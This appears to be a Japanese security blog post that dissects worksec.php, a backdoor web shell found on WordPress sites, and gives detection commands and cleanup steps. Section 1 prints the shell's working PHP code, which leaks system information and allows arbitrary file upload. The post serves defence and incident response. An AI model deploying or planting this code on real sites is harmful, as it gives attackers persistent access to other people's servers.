WordPress に潜む “worksec.php”（バックドア型ウェブシェル）イチマル+

はじめに

複数の WordPress サイトで突然見つかった worksec.php。
ルート直下・wp-admin/・wp-content/・.well-known/ など、フォルダを問わずコピーされていたのが特徴です。
この記事では 「コードから読み取れる事実」 と 「実害・対処法」 を、表を使わずにまとめます。

1. コードをざっくり分解

$file = 'worksec.php';
chmod($file, 0444);


error_reporting(0);
set_time_limit(0);


$user = get_current_user();
echo php_uname();   
echo getcwd();      
echo $user;         


if(isset($_POST['Submit'])){
    move_uploaded_file($_FILES['image']['tmp_name'],
                       $_FILES['image']['name']);
    chmod($_FILES['image']['name'], 0644);
    echo "Successfully Uploaded :D";
} else {
    echo '';
}

各処理の目的とリスク

1. 0444 に変更

   • ファイルを削除・改変しにくくし、バックドアを残す。

2. エラー非表示・無制限実行

   • 痕跡を減らし、長時間動かす。

3. 環境情報の漏えい

   • OS、パス、ユーザー名を外部に晒し、追加攻撃のヒントに。

4. 任意ファイルアップロード

   • .php でも何でも置けるため、二段階目のシェルを自由に設置できる。

2. 侵入経路を推測するヒント

1. 同じハッシュのファイルが大量複製
   → 自動スクリプトで一括コピー。

2. wp-l0gin.php、lock360.php など類似シェルも同梱
   → WordPress コア風の偽名で権限昇格を狙う。

3. ファイルを置ける権限を既に所持
   → 脆弱プラグイン経由のアップロード、または流出した FTP/SSH 資格情報。

3. 影響範囲を一気に洗い出すコマンド例

find /path/to/sites -name 'worksec.php'


find /path/to/sites -mtime -14 -name '*.php' -type f


grep 'worksec.php' /var/log/httpd/access_log

4. 安全に駆除し再発を防ぐ 6 ステップ

1. 検出した worksec.php を即削除する

2. 同時刻・同ハッシュの不審 PHP もまとめて削除する

3. WordPress コア・プラグイン・テーマを “公式パッケージ” で再展開する

4. 画像アップロード用など静的ディレクトリでは PHP を実行不可に設定する

5. FTP／SSH／WordPress すべてのアカウントをパスワード変更（不要アカウントは削除）

6. WAF とファイル改ざん監視を常時オンにする

5. まとめ ― 見つけた瞬間にやること

• 削除 → ハッシュ検索 → コア再展開

• アクセスログで侵入元 IP を特定しブロック

• PHP 実行権限を最小化し、監視を常態化

worksec.php は小さくても危険なバックドア。
コードを理解し、権限設計と監視体制で再侵入を防ぎましょう。